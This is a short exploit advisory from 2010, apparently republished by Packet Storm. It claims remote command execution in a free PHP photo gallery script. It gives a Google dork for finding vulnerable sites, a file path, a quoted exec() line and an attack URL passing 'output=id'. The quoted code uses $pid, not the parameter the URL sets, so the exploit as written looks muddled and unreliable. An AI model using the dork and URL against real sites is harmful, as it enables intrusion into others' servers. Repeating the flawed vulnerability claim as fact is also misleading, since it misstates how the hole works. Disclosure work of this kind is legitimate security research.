Free PHP Photo Gallery Script suffers from a remote command execution vulnerability.
3c98174abcc36787897313583267e4618b3fce8c331e862723872e7adafb017c# Exploit Title: Free PHP photo gallery script Remote Command Execution Vulnerability
# Date: 2010/07/21
# Author: ViRuS Qalaa
# Email: em9@live.com
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script: http://phpweby.com/downloads/gallery
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
# HaCkEr aRaR: y.0@hotmail.de
:::::::::::::::::::::::::
Iam ViRuS Qalaa Frome Iraq Hackers
=================Exploit=================
-=[ vuln c0de ]=-
exec('tasklist /FI "PID eq ' . $pid. '" /FO LIST', $output);
/jadro/libs/adodb/adodb-perf.inc.php
Line:39
----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"
http://{localhost}/{path}/jadro/libs/adodb/adodb-perf.inc.php?output=id
---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,Spy-iq
and My friends Others and My friends in MSN
EnJoY o_O
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed